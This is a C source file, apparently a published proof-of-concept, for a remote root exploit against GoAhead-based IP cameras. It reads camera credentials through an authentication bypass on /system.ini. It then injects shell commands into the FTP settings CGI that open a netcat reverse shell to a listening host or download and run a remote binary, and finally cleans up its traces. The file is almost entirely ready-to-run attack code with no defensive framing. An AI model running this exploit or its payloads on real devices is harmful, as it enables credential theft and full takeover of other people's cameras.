GoAhead Exploit

1. #include <stdio.h>
2. #include <string.h>
3. #include <stdlib.h>
4. #include <unistd.h>
5. #include <arpa/inet.h>
6. #include <netinet/in.h>
7. #include <sys/types.h>
8. #include <sys/socket.h>
9.  
10.  
11. #define CAM_PORT 80
12. #define REMOTE_HOST "192.168.1.1"
13. #define REMOTE_PORT "1337"
14. #define PAYLOAD_0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc%20" REMOTE_HOST "+" REMOTE_PORT "%20-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
15. #define PAYLOAD_1 "GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%s&loginpas=%s\r\n\r\n"
16. #define PAYLOAD_2 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=passpasspasspasspasspasspasspasspass&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
17.  
18.  
19. #define ALTERNATIVE_PAYLOAD_zero0 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(nc+" REMOTE_HOST "+" REMOTE_PORT "+-e/bin/sh)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
20. #define ALTERNATIVE_PAYLOAD_zero1 "GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%s&loginpas=%s&svr=192.168.1.1&port=21&user=ftp&pwd=$(wget+http://" REMOTE_HOST "/stufz&&./stuff)&dir=/&mode=PORT&upload_interval=0\r\n\r\n"
21.  
22. char *    creds(char  *argv,
23.                 int   get_config);
24.  
25. int       rce(char    *argv,
26.               char    *id,
27.               char    attack[],
28.               char    desc[]);
29.  
30.  
31. int   main(int        argc,
32.            char       **argv,
33.            char       **envp)
34. {
35.   char                *id;
36.  
37.   printf("Camera 0day root RCE with connect-back @PierreKimSec\n\n");
38.  
39.   if (argc < 2)
40.   {
41.      printf("%s target\n", argv[0]);
42.      printf("%s target --get-config      will dump the configuration and exit\n", argv[0]);
43.      return (1);
44.   }
45.  
46.   if (argc == 2)
47.     printf("Please run `nc -vlp %s` on %s\n\n", REMOTE_PORT, REMOTE_HOST);
48.  
49.   if (argc == 3 && !strcmp(argv[2], "--get-config"))
50.     id = creds(argv[1], 1);
51.   else
52.     id = creds(argv[1], 0);
53.  
54.   if (id == NULL)
55.   {
56.     printf("exploit failed\n");
57.     return (1);
58.   }
59.   printf("done\n");
60.  
61.   printf("    login = %s\n", id);
62.   printf("    pass  = %s\n", id + 32);
63.  
64.   if (!rce(argv[1], id, PAYLOAD_0, "planting"))
65.     printf("done\n");
66.   sleep(1);
67.   if (!rce(argv[1], id, PAYLOAD_1, "executing"))
68.     printf("done\n");
69.   if (!rce(argv[1], id, PAYLOAD_2, "cleaning"))
70.     printf("done\n");
71.   if (!rce(argv[1], id, PAYLOAD_1, "cleaning"))
72.     printf("done\n");
73.  
74.   printf("[+] enjoy your root shell on %s:%s\n", REMOTE_HOST, REMOTE_PORT);
75.  
76.   return (0);
77. }
78.  
79.  
80. char *    creds(char  *argv,
81.                 int   get_config)
82. {
83.   int                 sock;
84.   int                 n;
85.   struct sockaddr_in  serv_addr;
86.   char                buf[8192] = { 0 };
87.   char                *out;
88.   char                *tmp;
89.   char                payload[] = "GET /system.ini?loginuse&loginpas HTTP/1.0\r\n\r\n";
90.   int                 old_n;
91.   int                 n_total;
92.  
93.  
94.   sock = 0;
95.   n = 0;
96.   old_n = 0;
97.   n_total = 0;
98.  
99.   printf("[+] bypassing auth ... ");
100.  
101.   if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
102.   {
103.     printf("Error while creating socket\n");
104.     return (NULL);
105.   }
106.      
107.   memset(&serv_addr, '0', sizeof(serv_addr));
108.   serv_addr.sin_family = AF_INET;
109.   serv_addr.sin_port = htons(CAM_PORT);
110.  
111.   if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
112.   {
113.     printf("Error while inet_pton\n");
114.     return (NULL);
115.   }
116.  
117.   if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
118.   {
119.     printf("creds: connect failed\n");
120.     return (NULL);
121.   }
122.  
123.   if (send(sock, payload, strlen(payload) , 0) < 0)
124.   {
125.     printf("creds: send failed\n");
126.     return (NULL);
127.   }
128.  
129.   if (!(tmp = malloc(10 * 1024 * sizeof(char))))
130.     return (NULL);
131.  
132.   if (!(out = calloc(64, sizeof(char))))
133.     return (NULL);
134.  
135.   while ((n = recv(sock, buf, sizeof(buf), 0)) > 0)
136.   {
137.     n_total += n;
138.     if (n_total < 1024 * 10)
139.       memcpy(tmp + old_n, buf, n);
140.     if (n >= 0)
141.       old_n = n;
142.   }
143.  
144.   close(sock);
145.  
146.   /*
147.   [ HTTP HEADERS ]
148.   ...
149.  
150.   000????: 0000 0a0a 0a0a 01.. .... .... .... ....
151.                 ^^^^ ^^^^ ^^
152.                 Useful reference in the binary data
153.                 in order to to find the positions of
154.                 credentials
155.   ...
156.   ...
157.   0000690: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
158.   00006a0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
159.   00006b0: 6164 6d69 6e00 0000 0000 0000 0000 0000  admin...........
160.   00006c0: 0000 0000 0000 0000 0000 0000 0000 0000  ................
161.   ...
162.  
163.   NOTE: reference can be too:
164.   000????: 0006 0606 0606 0100 000a .... .... ....
165.  
166.   Other method: parse everything, find the "admin" string and extract the associated password
167.   by adding 31bytes after the address of 'a'[dmin].
168.   Works if the login is admin (seems to be this by default, but can be changed by the user)
169.   */
170.  
171.   if (get_config)
172.   {
173.     for (unsigned int j = 0; j < n_total && j < 10 * 1024; j++)
174.       printf("%c", tmp[j]);
175.     exit (0);
176.   }
177.  
178.  
179.   for (unsigned int j = 50; j < 10 * 1024; j++)
180.   {
181.      if (tmp[j - 4] == 0x0a &&
182.          tmp[j - 3] == 0x0a &&
183.          tmp[j - 2] == 0x0a &&
184.          tmp[j - 1] == 0x0a &&
185.          tmp[j]     == 0x01)
186.      {
187.        if (j + 170 < 10 * 1024)
188.        {
189.          strcat(out, &tmp[j + 138]);
190.          strcat(out + 32 * sizeof(char), &tmp[j + 170]);
191.          free(tmp);
192.  
193.          return (out);
194.        }
195.      }
196.   }
197.  
198.   free(tmp);
199.  
200.   return (NULL);
201. }
202.  
203. int       rce(char    *argv,
204.               char    *id,
205.               char    attack[],
206.               char    desc[])
207. {
208.   int                 sock;
209.   struct sockaddr_in  serv_addr;
210.   char                *payload;
211.  
212.   if (!(payload = calloc(512, sizeof(char))))
213.     return (1);
214.  
215.   sock = 0;
216.  
217.   printf("[+] %s payload ... ", desc);
218.  
219.   if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
220.   {
221.     printf("Error while creating socket\n");
222.     return (1);
223.   }
224.  
225.   memset(&serv_addr, '0', sizeof(serv_addr));
226.   serv_addr.sin_family = AF_INET;
227.   serv_addr.sin_port = htons(CAM_PORT);
228.  
229.   if (inet_pton(AF_INET, argv, &serv_addr.sin_addr) <= 0)
230.   {
231.     printf("Error while inet_pton\n");
232.     return (1);
233.   }
234.  
235.   if (connect(sock, (struct sockaddr *)&serv_addr , sizeof(serv_addr)) < 0)
236.   {
237.     printf("rce: connect failed\n");
238.     return (1);
239.   }
240.  
241.  
242.   sprintf(payload, attack, id, id + 32);
243.   if (send(sock, payload, strlen(payload) , 0) < 0)
244.   {
245.     printf("rce: send failed\n");
246.     return (1);
247.   }
248.   return (0);
249. }